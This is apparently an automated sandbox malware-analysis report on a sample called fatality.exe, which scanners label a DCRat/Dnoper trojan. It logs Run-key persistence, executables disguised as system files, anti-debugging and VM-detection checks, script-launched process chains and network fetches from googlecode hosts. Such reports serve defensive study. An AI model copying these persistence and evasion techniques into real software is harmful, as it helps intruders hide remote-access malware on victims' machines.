                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run smss
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerReview
                                      Source: C:\blockcomSession\containerReview.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DHqwUEpsrWozPqmBWAUuPmQlLJtKzj
                                      Source: C:\Users\user\Desktop\fatality.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Desktop\fatality.exe Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\Resources\Themes\icsys.icn.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\Resources\Themes\explorer.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\Resources\spoolsv.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\Resources\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\Idle.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\smss.exe Process information set: NOOPENFILEERRORBOX
                                      Source: C:\blockcomSession\containerReview.exe Memory allocated: 1680000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\containerReview.exe Memory allocated: 1B300000 memory reserve | memory write watch
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe Memory allocated: BE0000 memory reserve | memory write watch
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe Memory allocated: 1A4E0000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe Memory allocated: F10000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe Memory allocated: 1AD80000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\Idle.exe Memory allocated: 1240000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\Idle.exe Memory allocated: 1AFC0000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\Idle.exe Memory allocated: 9D0000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\Idle.exe Memory allocated: 1A710000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\smss.exe Memory allocated: 15F0000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\smss.exe Memory allocated: 1B0A0000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\smss.exe Memory allocated: 3100000 memory reserve | memory write watch
                                      Source: C:\blockcomSession\smss.exe Memory allocated: 1B100000 memory reserve | memory write watch
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 0_2_00403A5C sgdt fword ptr [eax]
                                      Source: C:\blockcomSession\containerReview.exe Thread delayed: delay time: 922337203685477
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe Thread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe Thread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\Idle.exe Thread delayed: delay time: 922337203685477
                                      Source: C:\blockcomSession\smss.exe Thread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                      Source: C:\Users\user\Desktop\fatality.exe Window / User API: threadDelayed 646
                                      Source: C:\Users\user\Desktop\fatality.exe Window / User API: threadDelayed 678
                                      Source: C:\Windows\Resources\Themes\explorer.exe Window / User API: threadDelayed 816
                                      Source: C:\Windows\Resources\Themes\explorer.exe Window / User API: foregroundWindowGot 581
                                      Source: C:\Windows\Resources\svchost.exe Window / User API: threadDelayed 1144
                                      Source: C:\Windows\Resources\svchost.exe Window / User API: threadDelayed 523
                                      Source: C:\Windows\Resources\svchost.exe Window / User API: foregroundWindowGot 1046
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                                      Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zRrwKlet.log
                                      Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\FJTVnRjh.log
                                      Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\hEPrrPJe.log
                                      Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZKzjsAAu.log
                                      Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SdSCeHzI.log
                                      Source: C:\blockcomSession\containerReview.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XWvbHmEw.log
                                      Source: C:\Users\user\Desktop\fatality.exe API coverage: 8.7 %
                                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 7544 Thread sleep count: 816 > 30
                                      Source: C:\Windows\Resources\Themes\explorer.exe TID: 7544 Thread sleep count: 124 > 30
                                      Source: C:\Windows\Resources\svchost.exe TID: 7596 Thread sleep count: 1144 > 30
                                      Source: C:\Windows\Resources\svchost.exe TID: 7596 Thread sleep count: 523 > 30
                                      Source: C:\blockcomSession\containerReview.exe TID: 7888 Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe TID: 7360 Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe TID: 4928 Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\blockcomSession\Idle.exe TID: 5440 Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\blockcomSession\Idle.exe TID: 8092 Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\blockcomSession\smss.exe TID: 5024 Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\blockcomSession\smss.exe TID: 7996 Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                                      Source: C:\blockcomSession\containerReview.exe File Volume queried: C:\ FullSizeInformation
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe File Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe File Volume queried: C:\ FullSizeInformation
                                      Source: C:\blockcomSession\Idle.exe File Volume queried: C:\ FullSizeInformation
                                      Source: C:\blockcomSession\smss.exe File Volume queried: C:\ FullSizeInformation
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008EA69B FindFirstFileW,FindFirstFileW
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_04936863 NtQueryInformationProcess,GetSystemInfo
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\Documents\desktop.ini
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\AppData
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\AppData\Local\Temp
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\Desktop\desktop.ini
                                      Source: C:\blockcomSession\containerReview.exe File opened: C:\Users\user\AppData\Local
                                      Source: fatality.exe, 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: VBoxService.exe
                                      Source: fatality.exe, 00000001.00000003.1715310233.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`Ee%SystemRoot%\system32\mswsock.dll
                                      Source: fatality.exe, fatality.exe, 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: ~VirtualMachineTypes
                                      Source: fatality.exe, fatality.exe, 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
                                      Source: explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2940622995.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                                      Source: wscript.exe, 00000006.00000003.1822031745.000000000349A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                      Source: fatality.exe, 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: VMWare
                                      Source: fatality.exe, 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                                      Source: fatality.exe, 00000001.00000003.1715310233.0000000002DCF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\
                                      Source: fatality.exe, 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: &VBoxService.exe
                                      Source: containerReview.exe, 0000000D.00000002.1906268968.0000000003438000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Oaa7aaa88d3a38afffd0fc4037a0f3870f888d81451df92c17a8ef3701b17cc498beb201989a8dabhgfSw<
                                      Source: C:\Users\user\Desktop\fatality.exe Process information queried: ProcessInformation

                                      Anti Debugging

                                      Source: C:\Users\user\Desktop\fatality.exe Thread information set: HideFromDebugger
                                      Source: C:\Users\user\Desktop\fatality.exe Open window title or class name: ollydbg
                                      Source: C:\Users\user\Desktop\fatality.exe File opened: SIWDEBUG
                                      Source: C:\Users\user\Desktop\fatality.exe File opened: NTICE
                                      Source: C:\Users\user\Desktop\fatality.exe File opened: SICE
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_00907DEE mov eax, dword ptr fs:[00000030h]
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_0493606C mov eax, dword ptr fs:[00000030h]
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_04936391 mov eax, dword ptr fs:[00000030h]
                                      Source: C:\blockcomSession\containerReview.exe Process token adjusted: Debug
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe Process token adjusted: Debug
                                      Source: C:\blockcomSession\Idle.exe Process token adjusted: Debug
                                      Source: C:\blockcomSession\smss.exe Process token adjusted: Debug
                                      Source: C:\blockcomSession\containerReview.exe Memory allocated: page read and write | page guard

                                      HIPS / PFW / Operating System Protection Evasion

                                      Source: C:\Windows\Resources\Themes\explorer.exe Network Connect: 74.125.133.82 80
                                      Source: C:\Windows\Resources\Themes\explorer.exe Network Connect: 64.233.167.82 80
                                      Source: C:\Windows\Resources\Themes\explorer.exe Network Connect: 66.102.1.82 80
                                      Source: C:\Windows\System32\svchost.exe Memory written: PID: 7892 base: 1C0000 value: 00
                                      Source: C:\Windows\System32\svchost.exe Memory written: PID: 7892 base: 3662D8 value: 00
                                      Source: C:\Windows\System32\svchost.exe Memory written: PID: 7892 base: 3671E8 value: 00
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008FB7E0 __EH_prolog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,KiUserCallbackDispatcher,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,_swprintf,_swprintf,ShellExecuteExW,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW
                                      Source: C:\Users\user\Desktop\fatality.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe"
                                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "
                                      Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
                                      Source: C:\Windows\System32\svchost.exe Process created: unknown unknown
                                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"
                                      Source: C:\blockcomSession\containerReview.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hr0ztmo\0hr0ztmo.cmdline"
                                      Source: C:\blockcomSession\containerReview.exe Process created: unknown unknown
                                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8F5.tmp" "c:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP"
                                      Source: C:\Users\user\Desktop\fatality.exe Code function: 1_2_008FF654 cpuid
                                      Source: C:\blockcomSession\containerReview.exe Queries volume information: C:\blockcomSession\containerReview.exe VolumeInformation
                                      Source: C:\blockcomSession\containerReview.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                      Source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe Queries volume information: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe VolumeInformation
                                      Source: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe VolumeInformation
                                      Source: C:\blockcomSession\Idle.exe Queries volume information: C:\blockcomSession\Idle.exe VolumeInformation
                                      Source: C:\blockcomSession\Idle.exeQueries volume information: C:\blockcomSession\Idle.exe VolumeInformation
                                      Source: C:\blockcomSession\smss.exeQueries volume information: C:\blockcomSession\smss.exe VolumeInformation
                                      Source: C:\blockcomSession\smss.exeQueries volume information: C:\blockcomSession\smss.exe VolumeInformation
                                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                      Stealing of Sensitive Information

Source: Yara match File source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: containerReview.exe PID: 7868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe PID: 7656, type: MEMORYSTR
Source: Yara match File source: fatality.exe, type: SAMPLE
Source: Yara match File source: 1.3.fatality.exe .57e06fb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.fatality.exe .6f796fb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.containerReview.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.fatality.exe .57e06fb.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.fatality.exe .6f796fb.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1705089952.00000000056A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1823570813.0000000000D82000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1704006119.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\blockcomSession\Idle.exe, type: DROPPED
Source: Yara match File source: C:\blockcomSession\containerReview.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, type: DROPPED
Source: Yara match File source: C:\blockcomSession\smss.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Desktop\fatality.exe , type: DROPPED

                                      Remote Access Functionality

Source: Yara match File source: 0000000D.00000002.1915424378.000000001346B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: containerReview.exe PID: 7868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe PID: 7656, type: MEMORYSTR
Source: Yara match File source: fatality.exe, type: SAMPLE
Source: Yara match File source: 1.3.fatality.exe .57e06fb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.fatality.exe .6f796fb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.containerReview.exe.d80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.fatality.exe .57e06fb.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.fatality.exe .6f796fb.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1705089952.00000000056A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1823570813.0000000000D82000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1704006119.0000000006E39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\blockcomSession\Idle.exe, type: DROPPED
Source: Yara match File source: C:\blockcomSession\containerReview.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe, type: DROPPED
Source: Yara match File source: C:\blockcomSession\smss.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\Desktop\fatality.exe , type: DROPPED

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| Gather Victim Identity Information | 11 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 11 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | OS Credential Dumping | 3 File and Directory Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 25 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Windows Service | 1 Windows Service | 3 Obfuscated Files or Information | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 211 Process Injection | 34 Software Packing | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 21 Registry Run Keys / Startup Folder | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 333 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 211 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

[Behavior graph: ID: 1590002, Sample: fatality.exe, Startdate: 13/01/2025, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
| fatality.exe | 97% | ReversingLabs | Win32.Trojan.Golsys | |
| fatality.exe | 100% | Avira | VBS/Runner.VPG | |
| fatality.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| C:\Windows\Resources\Themes\icsys.icn.exe | 100% | Avira | TR/Patched.Ren.Gen | |
| C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 100% | Avira | TR/Spy.Agent.cptjt | |
| C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 100% | Avira | TR/Spy.Agent.cptjt | |
| C:\Windows\Resources\svchost.exe | 100% | Avira | TR/Patched.Ren.Gen | |
| C:\Users\user\Desktop\zRrwKlet.log | 100% | Avira | TR/AVI.Agent.updqb | |
| C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 100% | Avira | TR/Spy.Agent.cptjt | |
| C:\blockcomSession\Idle.exe | 100% | Avira | TR/Spy.Agent.cptjt | |
| C:\Users\user\AppData\Local\Temp\Q048Q85hCW.bat | 100% | Avira | BAT/Delbat.C | |
| C:\Users\user\Desktop\fatality.exe  | 100% | Avira | VBS/Runner.VPG | |
| C:\Users\user\Desktop\SdSCeHzI.log | 100% | Avira | TR/PSW.Agent.qngqt | |
| C:\Windows\Resources\Themes\explorer.exe | 100% | Avira | TR/Patched.Ren.Gen | |
| C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe | 100% | Avira | VBS/Runner.VPG | |
| C:\Windows\Resources\spoolsv.exe | 100% | Avira | TR/Patched.Ren.Gen | |
| C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML | | |
| C:\Windows\Resources\Themes\icsys.icn.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 100% | Joe Sandbox ML | | |
| C:\Windows\Resources\svchost.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\hEPrrPJe.log | 100% | Joe Sandbox ML | | |
| C:\blockcomSession\Idle.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\fatality.exe  | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\SdSCeHzI.log | 100% | Joe Sandbox ML | | |
| C:\Windows\Resources\Themes\explorer.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\FJTVnRjh.log | 100% | Joe Sandbox ML | | |
| C:\Windows\Resources\spoolsv.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\Program Files\Mozilla Firefox\fonts\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 77% | Virustotal | | Browse |
| C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\Users\user\AppData\Roaming\Microsoft\AddIns\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 77% | Virustotal | | Browse |
| C:\Users\user\Desktop\FJTVnRjh.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\FJTVnRjh.log | 11% | Virustotal | | Browse |
| C:\Users\user\Desktop\SdSCeHzI.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\SdSCeHzI.log | 69% | Virustotal | | Browse |
| C:\Users\user\Desktop\XWvbHmEw.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\ZKzjsAAu.log | 25% | ReversingLabs | | |
| C:\Users\user\Desktop\fatality.exe  | 71% | ReversingLabs | Win32.Trojan.DCRat | |
| C:\Users\user\Desktop\hEPrrPJe.log | 29% | ReversingLabs | Win32.Trojan.Generic | |
| C:\Users\user\Desktop\zRrwKlet.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\blockcomSession\Idle.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\blockcomSession\containerReview.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\blockcomSession\smss.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |

                                      No Antivirus matches

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| googlecode.l.googleusercontent.com | 66.102.1.82 | true | false | | high |
| codecmd01.googlecode.com | unknown | unknown | false | | high |
| codecmd03.googlecode.com | unknown | unknown | false | | high |
| codecmd02.googlecode.com | unknown | unknown | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
| http://codecmd01.googlecode.com/files/tjcm.gif | false | | high |
| http://codecmd02.googlecode.com/files/tjcm.gif | false | | high |
| http://codecmd03.googlecode.com/files/tjcm.gif | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
                                                                                                    high
                                                                                                    http://codecmd03.googlecode.com/files/tjcm.gifBexplorer.exe, 00000003.00000002.2940622995.0000000000663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://codecmd03.googlecode.com/explorer.exe, 00000003.00000002.2940622995.0000000000629000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
